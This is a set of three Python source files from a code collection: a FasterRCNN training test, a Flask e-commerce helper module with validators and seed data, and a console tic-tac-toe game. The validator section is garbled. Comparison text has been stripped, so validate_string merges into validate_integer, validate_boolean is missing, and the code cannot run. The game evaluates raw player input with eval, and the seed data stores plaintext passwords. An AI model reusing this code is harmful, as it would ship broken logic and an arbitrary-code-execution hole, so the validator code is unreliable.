torch.utils.data import DataLoader\n\nfrom pl_bolts.datamodules import DummyDetectionDataset\nfrom pl_bolts.models.detection import FasterRCNN\n\n\ndef _collate_fn(batch):\n return tuple(zip(*batch))\n\n\ndef test_fasterrcnn(tmpdir):\n\n model = FasterRCNN()\n\n image = torch.rand(1, 3, 400, 400)\n model(image)\n\n\ndef test_fasterrcnn_train(tmpdir):\n\n model = FasterRCNN()\n\n train_dl = DataLoader(DummyDetectionDataset(), collate_fn=_collate_fn)\n valid_dl = DataLoader(DummyDetectionDataset(), collate_fn=_collate_fn)\n\n trainer = pl.Trainer(fast_dev_run=True, default_root_dir=tmpdir)\n trainer.fit(model, train_dl, valid_dl)\n","sub_path":"tests/models/test_detection.py","file_name":"test_detection.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407176410","text":"\"\"\"\nFunctions:\n\n- my_error(status=404 ,description=\"\"):\n- get_in_stock_products()\n\n\n- validate_model_id(input_id,model_query,model_name_string)\n- validate_string(input_string,max_length,string_name)\n- validate_boolean(input_boolean,input_name_string)\n- validate_integer(input_integer,input_name_string,maximum,minimum)\n- validate_float(input_float,input_name_string,maximum,minimum)\n\n\n\n- db_drop_and_create_all()\n- populate_tables()\n\n\n\n\n- 
QUESTIONS_PER_PAGE = 10\n- def paginate_questions(questions_list,pagination)\n- def question_search(input_text)\n\n\n\"\"\"\n\ntry:\n\tfrom __init__ import *\nexcept:\n\tfrom src import *\n\n\n\nALLOWED_IMAGE_FORMATS=[\"png\",\"jpg\"]\n\n\n\n\nimport json\nfrom flask import Flask, request, jsonify, abort\nimport base64\n# Creating a function to return the error in an appropriate way\n#with detailed info\ndef my_error(status=404, description=\"\"):\n\n\tif status not in [400,401,403,404,405,422,500]:\n\t\traise Exception(\"status is \"+str(status)\n\t\t\t+ \", not in [400,401,403,404,405,422,500]\")\n\tif status == 400: message = \"bad request\"\n\telif status == 401: message = \"unauthorized\"\n\telif status == 403: message = \"forbidden\"\n\telif status == 404: message = \"not found\"\n\telif status == 405: message = \"method not allowed\"\n\telif status == 422: message = \"unprocessable\"\n\telse: message = \"internal server error\"\n\n\terror_dict = {\"success\": False,\n\t\t\"error\": status,\"message\": message,}\n\n\tif description == \"\": return jsonify(error_dict),status\n\n\terror_dict[\"description\"] = description\n\treturn jsonify(error_dict),status\n\n\n\ndef get_in_stock_products():\n    return Product.query.filter(Product.in_stock==True\n        ).order_by(Product.id).all()\n\n\n\n\n\n\"\"\"\nThis function has 3 inputs:\n1)\tinput_id: an integer, to be validated that\n\t\tit exists or not in the table\n\t\tExample: 1, 2 or 50\n2)\tmodel_query: this is the query of the model\n\t\tExample: Product.query, Order.query\n3)\tmodel_name_string: the name of the table\n\t\tExample: \"product\", \"order\"\n\nOutput:\n-\t{case,result}\ncase:1\n\t-\tSuccessful: id exists\n\t-\tresult = correct output\ncase:2\n\t-\tUnsuccessful: id does not exist\n\t-\tresult = [] (empty list)\n\ncase:3\n\t- \tFailed:\tthere was an error while validating\n\t- \tresult:\terror message\ncase:4\n\t-\tFailed input is none\n\t- \tresult:\tNone\n\n\"\"\"\ndef validate_model_id(input_id,model_query,model_name_string):\n\t#Validate that model id has a value, not None\n\tif input_id == None: return {\"case\":4,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" is missing\"}}\n\n\t#Validate that model id can be converted to int\n\ttry:\n\t\tid = int(input_id)\n\texcept:\n\t\treturn {\"case\":3,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" id can not be converted to integer\"}}\n\t\t#[False,my_error(status=400, description=model_name_string+\" id can not be converted to integer\")]\n\n\t#Validate that id is not negative or zero\n\tif id<=0:\n\t\treturn {\"case\":3,\"result\":{\"status\":422,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" id can not be less than\"+\n\t\t\t\" or equal to 0\"}}\n\n\ttry:\n\t\titem = model_query.filter_by(id=id).all()\n\texcept Exception as e:\n\t\treturn {\"case\":3,\"result\":{\"status\":400,\n\t\t\t\"description\":model_name_string+\n\t\t\t\" could not be queried\"}}\n\tif len(item) == 0 :\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":\"there is no \" +model_name_string+\n\t\t\t\" with this id\"}}\n\n\treturn {\"case\":1,\"result\":item[0]}\n\n\n\n\n\ndef validate_string(input_string,string_name,minimum_length=0,\n\tmax_length=1000000):\n\t#Validate that input has a value, not None\n\tif input_string == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input can be converted to string\n\ttry:\n\t\tresult = str(input_string)\n\texcept:\n\t\treturn 
{\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":string_name+\n\t\t\t\" can not be converted to string\"}}\n\n\t#Validate that input length is less that 100\n\tif len(result)>max_length:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":\"maximum \"+ string_name\n\t\t\t+\" length is \"+str(max_length)+\" letters\"}}\n\n\tif len(result)int(maximum):\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be more than \"+ str(maximum)}}\n\treturn {\"case\":1,\"result\":result}\n\n\n\ndef validate_float(\n\tinput_float,input_name_string,maximum,minimum):\n\t#Validate that input has a value, not None\n\tif input_float == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input can be converted to float\n\ttry:\n\t\tresult = float(input_float)\n\texcept:\n\t\treturn {\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be converted to float\"}}\n\n\t#Validate that input is not less than minimum\n\tif resultfloat(maximum):\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be more than \"+ str(maximum)}}\n\treturn {\"case\":1,\"result\":result}\n\n\n\ndef validate_base64(\n\tinput_string,input_name_string,maximum_length,minimum_length):\n\t#Validate that input has a value, not None\n\tif input_string == None: return {\"case\":3,\"result\":None}\n\n\t#Validate that input is string\n\tif type(input_string)!= str:\n\t\treturn {\"case\":2,\"result\":{\"status\":400,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" is not a string\"}}\n\n\t#Validate that input length is not less than minimum\n\tif len(input_string)maximum_length:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" length can not be more than \"+ str(maximum_length)+ \" characters\"}}\n\n\tvalidation = isBase64(input_string)\n\tif validation == True:\n\t\treturn {\"case\":1,\"result\":input_string}\n\telse:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":input_name_string+\n\t\t\t\" can not be converted to base64\"}}\n\ndef validate_formatting(input_formatting):\n\tvalidation = validate_string(input_formatting,\"formatting\",minimum_length=2,\n\tmax_length=20)\n\tif validation[\"case\"] != 1:\n\t\treturn validation\n\tinput_formatting = validation[\"result\"]\n\tif input_formatting not in ALLOWED_IMAGE_FORMATS:\n\t\treturn {\"case\":2,\"result\":{\"status\":422,\n\t\t\t\"description\":str(input_formatting)+\" is not allowed image format\"}}\n\treturn {\"case\":1,\"result\":input_formatting}\n\n\n\n\n\n\n\n\"\"\"\ntype:\n\t- \"s\" : String\n\t- \"i\" : Integer\n\t- \"f\" : Float\n\t- \"b\" : Boolean\n\t- \"b64\" : base64\n\t- \"frmt\": Image Formatting\n\n\"\"\"\ndef validate__must(input,type,\n\tinput_name_string,maximum=0,minimum=0):\n\tvalidation=0;\n\tif type == \"s\":\n\t\tvalidation= validate_string(\n\t\t\tinput_string=input,\n\t\t\tmax_length=maximum,string_name=input_name_string,\n\t\t\tminimum_length=minimum)\n\telif type == \"i\":\n\t\tvalidation= validate_integer(\n\tinput_integer=input,input_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\telif type == \"f\":\n\t\tvalidation= validate_float(\n\tinput_float=input,input_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\telif type == \"b\":\n\t\tvalidation = validate_boolean(input_boolean=input\n\t\t\t,input_name_string=input_name_string)\n\telif 
type == \"b64\":\n\t\tvalidation = validate_base64(\n\t\t\tinput_string=input,input_name_string=input_name_string,\n\t\t\tmaximum_length=maximum,minimum_length=minimum)\n\telif type == \"frmt\":\n\t\tvalidation = validate_formatting(input_formatting=input)\n\telse:\n\t\traise Exception(\"validate_must: type is\"+str(type)\n\t\t\t+ \"and it can not be like this, it should be: \"+\n\t\t\t\"'s', 'i', 'f' or 'b'\")\n\tif validation[\"case\"] == 1:\n\t\t# Success: correct data type\n\t\treturn {\"case\":True,\n\t\t\"result\": validation[\"result\"]}\n\telif validation[\"case\"] == 2:\n\t\t# Failure: Can't convert to correct data type\n\t\treturn {\"case\":False,\n\t\t\"result\": {\"status\":validation[\"result\"][\"status\"],\n\t\t\t\"description\":validation[\"result\"][\"description\"]}}\n\telse:\n\t\t# no Input is given, result = None\n\t\treturn {\"case\":False,\n\t\t\"result\": {\"status\":400,\"description\":\n\t\t\tinput_name_string+\" is missing\"}}\n\n\n\n\n\ndef validate_must(input,type,\n\tinput_name_string,maximum=0,minimum=0):\n\n\tvalidation=validate__must(input=input,type=type,\n\tinput_name_string=input_name_string,\n\tmaximum=maximum,minimum=minimum)\n\n\tif validation[\"case\"]:\n\t\treturn validation\n\treturn {\"case\":False,\n\t\t\"result\": my_error(\n\t\tstatus=validation[\"result\"][\"status\"]\n\t\t\t,description=validation[\"result\"][\"description\"])}\n\n\n\n\n\ndef validate_must_group(validations_list):\n\tto_return=[]\n\tfor val in validations_list:\n\t\tif val[\"case\"]==True:\n\t\t\tto_return.append(val[\"result\"])\n\t\telse:\n\t\t\treturn {\"case\":False,\"result\":val[\"result\"]}\n\treturn {\"case\":True,\"result\":to_return}\n\n\n\n\n\n\n\n# pass function will validate whther the input is base 64 or not\n# True:base64\n# False:Not base64\ndef isBase64(input_string):\n\tif type(input_string)!=str:\n\t\treturn False\n\tif len(input_string)%4 != 0:\n\t\treturn False\n\tfor char in input_string:\n\t\tbase64_list = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n\t\t\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\n\t\t\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\n\t\t\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\",\n\t\t\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"0\",\"/\",\"=\",\"+\"]\n\t\tif char not in base64_list:\n\t\t\treturn False\n\treturn True\n\n\n\n\"\"\"\nInputs:\n\t- b64String: This is a string that has been validated to be b64\n\t- formatting: \"png\" ot \"jpg\" or a value in the ALLOWED_IMAGE_FORMATS list\n\"\"\"\ndef b64ToImg(b64String,formatting):\n\treturn \"data:image/\"+formatting+\";base64,\"+b64String\n\n\n\"\"\"\nWe wil see how the frontend handles this first\n\nInputs:\n\t- imgString: a string that has been validated to\n\n\n\ndef imgToB64(imgString):\n\treturn \"data:image/\"+formatting+\";base64,\"+b64String\n\"\"\"\n\n\n\n\ndef db_drop_and_create_all():\n db.drop_all()\n db.create_all()\n\n\n\ndef populate_tables():\n db_drop_and_create_all()\n users = list()\n users.append(User(username=\"abc\",password=\"123456789\"))\n users.append(User(username=\"abcde\",password=\"456abcderrrt\"))\n users.append(User(username=\"klmn\",password=\"fde123987byt\"))\n users.append(User(username=\"rtb\",password=\"uytkltyopi889\"))\n users.append(User(username=\"cool\",password=\"freezererer\"))\n users.append(User(username=\"water\",password=\"TankTankTank\"))\n db.session.add_all(users)\n db.session.commit()\n\n\n 
products = list()\n    products.append(Product(\n        name=\"Labtop\", price=300, seller_id=\"1\"))\n    products.append(Product(\n        name=\"Mobile\", price=100, seller_id=\"2\", in_stock=False))\n    products.append(Product(\n        name=\"Candy\", price=.5, seller_id=\"3\", in_stock=True))\n    products.append(Product(\n        name=\"Table\", price=150, seller_id=\"1\", in_stock=False))\n    products.append(Product(\n        name=\"Keyboard\", price=5, seller_id=\"2\", in_stock=True))\n    products.append(Product(\n        name=\"Mouse\", price=4, seller_id=\"1\", in_stock=True))\n    db.session.add_all(products)\n    db.session.commit()\n\n    orders = list()\n    #id, user, product, amount\n    orders.append(Order(user_id=\"1\", product_id=1, amount=1))\n    orders.append(Order(user_id=\"2\", product_id=1, amount=4))\n    orders.append(Order(user_id=\"3\", product_id=2, amount=3))\n    orders.append(Order(user_id=\"1\", product_id=1, amount=2))\n    orders.append(Order(user_id=\"2\", product_id=2, amount=1))\n    orders.append(Order(user_id=\"2\", product_id=3, amount=5))\n    orders.append(Order(user_id=\"1\", product_id=4, amount=20))\n    orders.append(Order(user_id=\"3\", product_id=5, amount=4))\n\n    db.session.add_all(orders)\n    db.session.commit()\n\n    images = list()\n    #id, seller, name, formatting\n    images.append(Image(seller_id=\"1\", name=\"Labtop\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"2\", name=\"Mobile\",\n        formatting=\"jpg\"))\n    images.append(Image(seller_id=\"3\", name=\"Lobtop\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"4\", name=\"Mobile\",\n        formatting=\"jpg\"))\n    images.append(Image(seller_id=\"5\", name=\"Keyboard\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"6\", name=\"Mouse\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"1\", name=\"USB\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"2\", name=\"Notebook\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"3\", name=\"Spoon\",\n        formatting=\"jpg\"))\n    images.append(Image(seller_id=\"4\", name=\"Fork\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"5\", name=\"Camera\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"6\", name=\"Radio\",\n        formatting=\"jpg\"))\n    images.append(Image(seller_id=\"1\", name=\"Pen\",\n        formatting=\"png\"))\n    images.append(Image(seller_id=\"2\", name=\"Back bag\",\n        formatting=\"jpg\"))\n    images.append(Image(seller_id=\"3\", name=\"Wireless Headphones\",\n        formatting=\"png\"))\n\n    db.session.add_all(images)\n    db.session.commit()\n\n\n\n\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef paginate_questions(questions_list,pagination):\n\t#This function will return a\n\t#(Paginated, formatted) list of questions\n\tmin_index=(pagination-1) * QUESTIONS_PER_PAGE\n\tmax_index=(pagination) * QUESTIONS_PER_PAGE\n\tpaginated_formatted_questions_list = list()\n\tfor index,question in enumerate(questions_list):\n\t\tif index >= min_index:\n\t\t\tif index < max_index:\n\t\t\t\tpaginated_formatted_questions_list.append(\n\t\t\t\t\tquestion.format())\n\treturn paginated_formatted_questions_list\n\n\n\n\n\n\n\"\"\"\nThis method searches inside the Question model.\n\nInput: String to be searched\nOutput: Formatted list of questions matching the search\n\"\"\"\ndef question_search(input_text):\n\tsearch_query = input_text.strip()\n\t#To remove the space from the beginning and the end of the string\n\tsearch_query = \"%\"+search_query+\"%\"\n\tall_questions = db.session.query(Question).filter(\n\t\tQuestion.question.ilike(search_query)).all()\n\tto_return = [question.format() for question in all_questions]\n\treturn 
to_return\n","sub_path":"src/backend/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":15483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203698578","text":"\"\"\"\nThe Game has a board where each column has a name starting from a -> i, in left -> right order,\nSample input : ['X', 'a'] or ('X', 'a'), where in the list or tuple the first element is the Charecter you have chosen for the \ngame and second element is the column you have choosen for the input.\n\"\"\"\n\n# -------------------------------------- Global Variables -------------------------------------#\nimport random\nimport time\nimport colorama\ncolorama.init()\ndata_dic = {'a': \" \", 'b': \" \", 'c': \" \", 'd': \" \", 'e': \" \", 'f': \" \", 'g': \" \", 'h': \" \", 'i': \" \"}\nChoice_dict = {'Player 1' : \" \", 'Player 2' : \" \", 'Computer': \" \"}\nvar = random.choice(['X','O','$','#','%','&','@'])\nGREEN = '\\u001b[32m'\nYELLOW = '\\u001b[33m'\nRESET = '\\u001b[0m'\nRED = '\\u001b[31m'\nCYAN = '\\u001b[36m'\nMAGENTA = '\\u001b[35m'\nBLUE = '\\u001b[34m'\nBOLD = '\\u001b[1m'\n\n\ndef Notice():\n print(\"\"\"Welcome to the Tic Tac Toe Game,\n by Apurba Ghosh\nThis Game involves two Functionality, 1. Player vs Player \n 2. Player vs Computer\nChoose an Option from 1 or 2 to Start the game, There are some\nfunctionalities to be noticed, if you want to Quit the game at \nany point of time, just type ('exit',) as input, \nRules:\n 1) You can't choose a column already filled, doing that it will\n give a prompt as many times as you do that.\n \n 2) Type your name at the very first starting of the program.\n \n 3) Avoid Choosing the same variable for both the user, if played \n Player vs Player.\n \n 4) You will always have to Give the same Variable which you have \n given as the very first input at the starting of the game, note: \n that you are free to choose any Variables or even numbers and not\n limited to only (X/O). Henceforth, Freedom is granted.\n \\n\\n\"\"\")\n \n\ndef choice():\n x = int(input(\"\"\"1. Player vs Player\n2. 
Player vs Computer \\t Choose: \"\"\"))\n return (x)\n\n\ndef board(container : str = \"\", screenwidth : int = 59, sign1 = \" \", sign2 = \" \", sign3 = \" \"):\n counter = 0\n while (counter <= 21):\n if (counter == 0 or counter == 14 or counter == 7 or counter == 21):\n container = f\"{YELLOW}-{RESET}\" * screenwidth\n print(container)\n counter += 1\n continue\n \n if (counter == 3):\n container = f\"{YELLOW}|{RESET} {data_dic['a']} {YELLOW}|{RESET} {data_dic['b']} {YELLOW}|{RESET} {data_dic['c']} {YELLOW}|{RESET}\" f\"{sign1}\"\n print(container)\n counter += 1 \n continue\n \n if (counter == 10):\n container = f\"{YELLOW}|{RESET} {data_dic['d']} {YELLOW}|{RESET} {data_dic['e']} {YELLOW}|{RESET} {data_dic['f']} {YELLOW}|{RESET}\" f\"{sign2}\"\n print(container)\n counter += 1\n continue\n \n if (counter == 17):\n container = f\"{YELLOW}|{RESET} {data_dic['g']} {YELLOW}|{RESET} {data_dic['h']} {YELLOW}|{RESET} {data_dic['i']} {YELLOW}|{RESET}\" f\"{sign3}\"\n print(container)\n counter += 1\n continue\n \n else:\n container = f\"{YELLOW}| | | |\"\n print(container)\n counter += 1\n \n \ndef check(a : str ,b : str ,c : str ,d : str ,e : str ,f : str ,g : str ,h : str ,i : str ):\n \n # Part 1:\n if (a == b == c):\n return (a)\n if (d == e == f):\n return (d)\n if (g == h == i):\n return (g)\n \n # Part 2:\n if (a == d == g):\n return (a)\n if (b == e == h):\n return (b)\n if (c == f == i):\n return (c)\n \n # Part 3:\n if (a == e == i):\n return (a)\n if (c == e == g):\n return (c)\n else:\n return (\" \")\n \n \ndef computerOverwrite(user : str):\n if (data_dic[user] != \" \"):\n return (True)\n else:\n return (False)\n\ndef overwrite(user : tuple):\n if (data_dic[user[1]] != \" \"):\n print(f\"{RED}Sorry the Column is already filled, Please Choose any other Column...{RESET}\")\n return (True)\n else:\n return (False)\n\n \ndef game():\n Notice()\n choices = choice()\n name2 = \"\"\n if choices == 2:\n name1 = input('Player 1, Enter Your Name: ')\n else:\n name1 = input('Player 1, Enter Your Name: ')\n name2 = input('Player 2, Enter Your Name: ')\n board()\n winner = \"\"\n counter = 1\n continuous_check = \" \"\n f = \"\"\n while (counter <= 9):\n if (counter%2 != 0):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n if (Choice_dict['Player 1'] == \" \"):\n pass\n else:\n if (Choice_dict['Player 1'] == user1[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n if (user1[0] == 'exit'):\n f = 'a'\n break\n else:\n pass\n info = overwrite(user1)\n if (info == True):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For 
Playing{RESET}\")\n f = 'a'\n break\n if (user1[0] == 'exit'):\n f = 'a'\n break\n info2 = overwrite(user1)\n while (info2 != False):\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n info2 = overwrite(user1)\n if (Choice_dict['Player 1'] == user1[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n while (user1[0] != Choice_dict['Player 1']):\n print(f\"{RED}Sorry You can't take {user1[0]}, You have to choose {Choice_dict['Player 1']}{RESET}\")\n user1 = eval(input(\"Player 1, Enter the Cloumn: \"))\n if (user1[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'a'\n break\n info2 = overwrite(user1)\n \n if (user1[0] == 'exit'):\n f = 'a'\n break \n else:\n pass\n else:\n pass\n \n if (user1[1] == 'a'):\n data_dic['a'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'b'):\n data_dic['b'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'c'):\n data_dic['c'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign1=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'd'):\n data_dic['d'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'e'):\n data_dic['e'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'f'):\n data_dic['f'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign2=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'g'):\n data_dic['g'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'h'):\n data_dic['h'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n if (user1[1] == 'i'):\n data_dic['i'] = f\"{RED}{user1[0]}{RESET}\"\n board(sign3=f\"{GREEN} <<--- {RESET}\")\n Choice_dict['Player 1'] = user1[0]\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n else:\n if choices == 2:\n print(\"Computer's Turn...\")\n column = ''\n for j in range(1):\n column = random.choice(['a','b','c','d','e','f','g','h','i'])\n info = computerOverwrite(column)\n while (info != False):\n column = random.choice(['a','b','c','d','e','f','g','h','i'])\n info = computerOverwrite(column)\n if (column == 'a'):\n data_dic['a'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'b'):\n data_dic['b'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'c'):\n data_dic['c'] = f\"{CYAN}{var}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'd'):\n data_dic['d'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'e'):\n data_dic['e'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'f'):\n data_dic['f'] = f\"{CYAN}{var}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'g'):\n data_dic['g'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'h'):\n data_dic['h'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (column == 'i'):\n data_dic['i'] = f\"{CYAN}{var}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- 
{RESET}\")\n winner = check(data_dic['a'],data_dic['b'],data_dic['c'],data_dic['d'],data_dic['e'],data_dic['f']\n ,data_dic['g'],data_dic['h'],data_dic['i'])\n Choice_dict['Computer'] = var\n if (winner != \" \"):\n continuous_check = (True,winner)\n break\n else:\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (Choice_dict['Player 2'] == \" \"):\n pass\n else:\n if (Choice_dict['Player 2'] == user2[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (user2[0] == 'exit'):\n f = 'b'\n break\n else:\n pass\n info = overwrite(user2)\n if (info == True):\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n if (user2[0] == 'exit'):\n f = 'b'\n break\n info2 = overwrite(user2)\n while (info2 != False):\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n info2 = overwrite(user2)\n if (Choice_dict['Player 2'] == user2[0]):\n pass\n else:\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n while (user2[0] != Choice_dict['Player 2']):\n print(f\"{RED}Sorry You can't take {user2[0]}, You have to choose {Choice_dict['Player 2']}{RESET}\")\n user2 = eval(input(\"Player 2, Enter the Cloumn: \"))\n if (user2[0] == 'exit'):\n print(f\"{BLUE}Thanks For Playing{RESET}\")\n f = 'b'\n break\n info2 = overwrite(user2)\n \n if (user2[0] == 'exit'):\n f = 'b'\n break \n else:\n pass\n else:\n pass\n \n if (user2[1] == 'a'):\n data_dic['a'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'b'):\n data_dic['b'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'c'):\n data_dic['c'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign1=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'd'):\n data_dic['d'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'e'):\n data_dic['e'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'f'):\n data_dic['f'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign2=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'g'):\n data_dic['g'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'h'):\n data_dic['h'] = f\"{CYAN}{user2[0]}{RESET}\"\n board(sign3=f\"{YELLOW} <<--- {RESET}\")\n if (user2[1] == 'i'):\n 
